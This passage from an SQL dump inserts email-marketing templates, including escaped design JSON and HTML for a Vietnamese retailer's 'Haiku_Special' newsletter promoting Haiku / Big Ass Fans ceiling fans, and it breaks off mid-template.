N\\u1eefa<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"04gNugS9ys\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2mvPoFJCm5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZA8TJ3zleD\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 4px 4px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-white\\\",\\\"icons\\\":[{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\" \\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":19,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"U54rwmEkOc\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"23px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#b8b8b8\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: sale@hogiaphat.vn\\u00a0<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"8hu9zilO_e\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"91%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#616888\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"19px 19px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"N9ssy1A_Ok\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#bbbbbb\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 16.8px;\\\\\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#272362\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":800,\\\"fontFamily\\\":{\\\"label\\\":\\\"Helvetica\\\",\\\"value\\\":\\\"helvetica,sans-serif\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontWeight\\\":400,\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#683d0d\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":false,\\\"linkHoverUnderline\\\":true,\\\"inherit\\\":false},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":12}\"', '', 1, '2023-03-04 15:36:35');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(11, 'Haiku_Special', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Playfair+Display:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #e1d0c6;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #e1d0c6;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #e1d0c6;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #a47e6b;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #a47e6b;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 5px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922239248-log_hq.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 15px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">NH\\u00c0 CUNG C\\u1ea4P \\u1ee6Y QUY\\u1ec0N CH\\u00cdNH H\\u00c3NG HAIKU - BIG ASS FANS T\\u1ea0I VI\\u1ec6T NAM<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ecf0f1;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: #ecf0f1;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922756155-smart-fans-haiku.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div>\\r\\n    <div class=\\\"col-lg-12 col-md-12 col-sm-12 col-xs-12\\\">\\r\\n<h3><span style=\\\"font-size: 16px;\\\">K\\u00edch th\\u01b0\\u1edbc \\u0111\\u01b0\\u1eddng k\\u00ednh c\\u00e1nh qu\\u1ea1t Haiku<\\/span><\\/h3>\\r\\n<p>52 inch, 60 inch v\\u00e0 84 inch. N\\u1ebfu b\\u1ea1n c\\u1ea7n c\\u00e1nh l\\u1edbn h\\u01a1n? H\\u00e3y xem <strong><a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-canh-lon\\\">Qu\\u1ea1t Tr\\u1ea7n C\\u00e1nh L\\u1edbn<\\/a>.<\\/strong><\\/p>\\r\\n  <img src=\\\"https:\\/\\/bigfans.vn\\/img\\/cms\\/demesion-fans\\/Fan-Haiku-Sizes.svg\\\" alt=\\\"Haiku Fans Size\\\"><\\/div><div class=\\\"col-lg-12 col-md-12 col-sm-12 col-xs-12\\\">\\r\\n<h2><span style=\\\"font-size: 16px;\\\">K\\u00edch th\\u01b0\\u1edbc c\\u00e1nh qu\\u1ea1t Haiku ph\\u00f9 h\\u1ee3p d\\u00e0nh cho Nh\\u00e0 \\u1ede, Bi\\u1ec7t Th\\u1ef1, Penthouse.<\\/span><\\/h2>\\r\\n<p>Thi\\u1ebft k\\u1ebf qu\\u1ea1t tr\\u1ea7n Haiku c\\u00f3 s\\u1ea3i c\\u00e1nh ph\\u1ed5 th\\u00f4ng 3 c\\u00e1nh ch\\u1ea5t li\\u1ec7u Bamboo\\/Aluminium\\/Composite<\\/p>\\r\\n<img src=\\\"https:\\/\\/bigfans.vn\\/img\\/cms\\/demesion-fans\\/Haiku-Dimensions.svg\\\" alt=\\\"Haiku Fans Size\\\"><\\/div>\\r\\n\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a47e6b; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 32px; line-height: 44.8px; font-family: \'Playfair Display\', serif;\\\">\\\" \\u0110\\u1eb3ng c\\u1ea5p th\\u01b0\\u1ee3ng l\\u01b0u<\\/span><\\/strong><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-family: \'Playfair Display\', serif; font-size: 32px; line-height: 44.8px;\\\">Ti\\u1ec7n \\u00edch x\\u1ee9ng t\\u1ea7m \\\"<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #292828; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>CH\\u1ea4T LI\\u1ec6U CAO C\\u1ea4P<\\/strong><br \\/>Haiku\\u00ae \\u0111\\u01b0\\u1ee3c l\\u00e0m th\\u1ee7 c\\u00f4ng v\\u1edbi<br \\/>v\\u1eadt li\\u1ec7u ch\\u1ea5t l\\u01b0\\u1ee3ng cao, nh\\u01b0 Moso Bamboo\\u00a0<br \\/>ho\\u1eb7c Alumium (aircraft-grade). Qu\\u1ea1t Haiku\\u00a0<br \\/>\\u0111\\u01b0\\u1ee3c c\\u00e2n b\\u1eb1ng tay trong quy tr\\u00ecnh 13 b\\u01b0\\u1edbc,\\u00a0<br \\/>\\u0111\\u1ea3m b\\u1ea3o s\\u1ebd kh\\u00f4ng c\\u00f3 qu\\u1ea1t n\\u00e0o rung l\\u1eafc.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" style=\\\"height:37px; v-text-anchor:middle; width:152px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#a87f6b;font-family:arial,helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:arial,helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">R E A D\\u00a0 M O R E<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table 